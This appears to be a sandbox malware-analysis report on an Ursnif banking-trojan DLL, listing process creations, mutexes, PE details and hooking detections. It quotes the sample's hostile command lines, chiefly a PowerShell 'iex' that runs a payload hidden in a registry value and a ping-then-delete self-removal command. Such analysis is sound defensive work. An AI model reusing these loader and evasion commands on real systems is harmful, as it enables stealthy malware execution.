                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                      Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\explorer.exe Process created: unknown unknown
                      Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1
                      Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@54/38@14/8
                      Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B04A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{9C6EB822-4BB9-2E3E-B590-AF42B9C45396}
                      Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6032BFB6-3FC2-92EA-C994-E3E60D08C77A}
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
                      Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
                      Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: uT9rwkGATJ.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb | source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
                      Source: Binary string: ntdll.pdb | source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: d.pdbp | source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP | source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U | source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb | source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
                      Source: uT9rwkGATJ.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: uT9rwkGATJ.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: uT9rwkGATJ.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: uT9rwkGATJ.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: uT9rwkGATJ.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

                      Suspicious powershell command line found
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1A21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1A2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B0ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B0AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00670B91 push edi; retf
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B56106 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B7A283 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00570B91 push edi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02DA0B91 push edi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0336A283 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03346106 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02BDABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02BDAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00840B91 push edi; retf
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress,
                      Source: hiiw3gsl.dll.31.dr | Static PE information: real checksum: 0x0 should be: 0x20ab
                      Source: uio4qdnj.dll.29.dr | Static PE information: real checksum: 0x0 should be: 0x7dd1
                      Source: uT9rwkGATJ.dll | Static PE information: real checksum: 0xa274a should be: 0xa6bea
                      Source: ebytp2em.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0x85fb
                      Source: hjljqxud.dll.32.dr | Static PE information: real checksum: 0x0 should be: 0xb2f3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ebytp2em.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\uio4qdnj.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\hjljqxud.dll

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exe | User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exe | Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exe | IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)
                      Source: explorer.exe | EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200
                      Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
